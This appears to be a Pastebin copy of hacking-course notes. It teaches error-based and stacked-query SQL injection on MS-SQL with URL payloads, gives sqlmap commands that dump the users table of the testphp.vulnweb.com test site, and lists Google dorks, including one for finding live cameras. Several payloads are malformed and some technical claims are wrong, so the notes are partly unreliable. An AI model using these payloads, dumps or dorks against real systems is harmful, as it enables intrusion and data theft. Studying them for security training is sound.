API tools faq
paste
Advertisement
Mukezh

Session Error based

Mukezh
Dec 20th, 2018
353
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.00 KB | None | 0 0
raw download clone embed print report
  1. =x=x
  2. Session 11
  3. Error Based Injection
  4. ============================
  5.  
  6. This type of Sql injection works only on the websites which are versed with the asp or aspx development i.e. developed by the Microsoft which implies that error based sql injection is something which works on MS-Sql not MY-SQL.
  7. In the Error-based SQL injection, the server does not show any data outside but it shows data in error itself. So instead of getting data on the page itself with various options, error based SQL injection gives output in Error itself.
  8.  
  9. Error Based SQL Injection works by generating a error condition in the SQL Syntax, so that the Database reverts back with the Error along with the Sensitive Data.
  10.  
  11.  
  12. =x=x=x=x=x==x=x=x=x=x=x==x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x
  13.  
  14. How does AND gate works:
  15.  
  16. A | B | Resultant |
  17. ------------------------------|
  18. 0 | 0 | 0 | ---> 0 * 0 = 0 --> False
  19. 0 | 1 | 0 | ---> 0 * 1 = 0 --> False
  20. 1 | 0 | 0 | ---> 1 * 0 = 0 --> False
  21. 1 | 1 | 1 | ---> 1 * 1 = 1 --> True
  22.  
  23.  
  24.  
  25.  
  26. Now the point arrives why we are studying AND gates?
  27. We all know at the backend everything works on 0 and 1 so when a website is opened up we observe that it must have send a status code 1 in response. so what if we just add "and 1=0;" which will get and with the status code 1 i.e. true and will make it show an error.
  28.  
  29. So we make error where we havee to go for :
  30.  
  31. here below it is given a rough estimation on how it looks like :
  32.  
  33.  
  34. www.abc.com/login/login.aspx?id=10 and 1=0;
  35. \______________ ________________/
  36. \/
  37. 1
  38. --> 1 and 1=0; it is a false condition
  39. --> 1 and 1=1; it is a true condition (many times it wil show up the error as well.)
  40.  
  41.  
  42. =x=x=x=x=x==x=x=x=x=x=x==x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x==x=x
  43.  
  44.  
  45.  
  46.  
  47. CONDITIONS OF ERROR BASED SQLInjection
  48. ======================================
  49. = Only One Query can execute at a Particular time
  50. (There should not be the like we have done in testphp.vulnweb.com where we had three vulnerable columns and we just inserted version and database to different places at the same time here you can't do that )
  51.  
  52. = It works on the basis of Last In First Out (LIFO). i.e. Stack
  53. (Anything which is present in the database are stored in the form of stack the data inserted at the last will be opted out from the database first)
  54.  
  55. = Only the Top Table of the Database can be accessed at a single particular time. Same goes for Columns and then for Rows.
  56.  
  57. Now lets look at the example below here we have 4 tables in a data of Hotel Mangaement System. So suppose the name of the site is www.abc.com.
  58.  
  59.  
  60. DATABASE NAME : Hotel
  61. Database Type: MS-SQL
  62. =============================
  63. ____{ |Cars__|__Bikes__|__CYCLES__|
  64. ____________________ / |______|_________|__________|
  65. | | / |_bmw__|__ninja__|__________|
  66. | Vehicles |< |______|splendor_|__________|
  67. |____________________| \ |_Rols_|_________|__________|
  68. | | \____ |______|_________|_Ranger___|
  69. | DISHES | { |______|_________|__________|
  70. | |
  71. |____________________|
  72. | |
  73. | USERS |
  74. | |
  75. | | ============================
  76. | | ____{ |Uname_|Password_|_Phone no.|
  77. | | / |______|_________|__________|
  78. | | __/ | AMY | 1234556 |9911202912|
  79. | | < __ |Rohit |C@@als |0098173723|
  80. | | \ |Sanj |Sanj1337 |9902132321|
  81. | | \____ |abhi |Lucifer |8976832132|
  82. |____________________| { |Vivaan|0sh0@123 |8976032212|
  83. | | ----------------------------- | |
  84. | |
  85. | Room NO. |
  86. | |
  87. | |
  88. |____________________|
  89.  
  90.  
  91. Step 1 : Normal Select TOP 1 will give the first column of the first table.
  92.  
  93. WWW.abc.com/login/login.aspx?id=1 and 1=0 union select top 1 from table_name from information_schema.tables
  94.  
  95.  
  96. Output --> Vehicles
  97.  
  98. Step 2: Now we dont want to excess the content of the table Vehicles then we will just EXCLUDE the table with the help of "NOT IN" clause .
  99.  
  100. WWW.abc.com/login/login.aspx?id=1'and 1=0 union select top 1 from table_name from information_schema.tables not in ("Vehicles")
  101. Output --> Dishes
  102.  
  103.  
  104. Step 3: Now we don't want to get the content of the table name = Dishes as well so we will add this table up to the not in list.
  105.  
  106. WWW.abc.com/login/login.aspx?id=1'and 1=0 union select top 1 from table_name from information_schema.tables not in ("Vehicles","Dishes")
  107. Output --> Users
  108.  
  109.  
  110.  
  111. Step 4: Now after getting inside the table name= Users we will now focus on getting the columns name as well.
  112.  
  113. WWW.abc.com/login/login.aspx?id=1 and 1=0 union select top 1 from column_name from information_schema.columns where table_name not in ("Vehicles","Dishes") --+
  114. Output --> Uname
  115.  
  116.  
  117. Step 5:
  118. Now the last procedure is to grab the data from the database.
  119. WWW.abc.com/login/login.aspx?id=1 and 1=0 union select top 1 from column_name from information_schema.columns where column_name not in ("Uname") and table_name not in ("Vehicles","Dishes") --+
  120.  
  121. =x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x==x=x=x=x=x=
  122.  
  123. STACKED QUERY SQL INJECTION
  124. ============================
  125.  
  126. Stacked Query SQL Injection is the one which can execute by terminating the original query and adding a new one, it will be possible to modify data and call stored procedures like creating, deleting and modifying the Database with there entities.
  127.  
  128. To see the criticality of the Stacked Queries based injection lets take an example of the bank and what if a database of the bank.com is compromised and a hacker just simply drop the database i.e. if deleted the whole information then every bank user will be rushing from place to place but won't get anything.
  129.  
  130. This can done by SQL Injection Automated Tools like “SQLMAP” etc.
  131.  
  132. =x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x===x=
  133.  
  134. SQLMAP
  135. =======
  136. SQLMAP is an open source python based penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many features lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
  137.  
  138. DEMONSTRATION ON KALI LINUX
  139. ============================
  140. SQLMAP is a CLI Based Tool which only runs on the Terminal of Kali Linux. Further are the steps to use this automated tool.
  141.  
  142. Target : http://testphp.vulnweb.com/
  143.  
  144. First Step is finding a GET Method in a Web Application, and then further enumerating it through sqlmap.
  145.  
  146. -> sqlmap
  147.  
  148. -> sqlmap --url “http://testphp.vulnweb.com/search.php?test=query”
  149. (-u or --url for entering a url having a GET Parameter)
  150.  
  151. -> sqlmap --url “http://testphp.vulnweb.com/search.php?test=query” --dbs
  152. (--dbs helps in executing the database() i.e helps in enumerating the database in the that perticular web application)
  153.  
  154. -> sqlmap --url “http://testphp.vulnweb.com/search.php?test=query” -D acuart --tables
  155. (now we will get the list of tables here where we are specifing that the ddatabase is "acuart".
  156.  
  157. -> sqlmap --url “http://testphp.vulnweb.com/search.php?test=query” -D acuart -T users --columns
  158. (Now get bit deeper and enumerate the columns of a table we will fix the databse then the table_name which is "users".)
  159.  
  160. -> sqlmap --url “http://testphp.vulnweb.com/search.php?test=query” -D acuart -T users --dump
  161. (Dumping all the necessary Data of the Columns of table User itself in the terminal to which is saved in the backend with the path specified here.)
  162.  
  163.  
  164. Thats how you get the juicy information of the table...
  165.  
  166. =x=x=x=x=x=x=x=x=x=x=x=x=x==x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=
  167.  
  168.  
  169. GOOGLE DORKING
  170. ================
  171. Google dorking, also known as Google hacking, can return information that is difficult to locate through simple search queries. That description includes information that is not intended for public viewing but that has not been adequately protected. Hackers use Google Dorking to extract only the Desired Data what they exactly want.
  172.  
  173. DORKS COMMANDS
  174. =================
  175.  
  176. = intitle : This allows a attacker to search for pages with specific text in their HTML = title. So intitle: “login page” will help a hacker to find out the web titled “login page”.
  177. = inurl : This allows a hacker to search for pages based on the text contained in the URL eg. “inurl : login.php”.
  178. = intext : This operator searches the entire content of a given page for keywords supplied by the attacker.
  179. = site : limits the scope of a query to a single website.
  180. = cache : This shows the attacker the cached/previous stored version of a website.
  181. = filetype : THis helps in differentiating a attacker the filetype/extension of a particular file he/she is searching.
  182. = indexof : This will helps in finding out the whole index a website is saving for multile files and is open to surf.
  183.  
  184. = Finding Live Cameras - (inurl = “/view/view.shtml?id-”) the resultant will be having the live cameras of Axis Company.
  185. \
  186.  
  187.  
  188. Google Hacking Database --> ghdb -> https://www.exploit-db.com/google-hacking-database/
  189.  
  190.  
  191. =x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!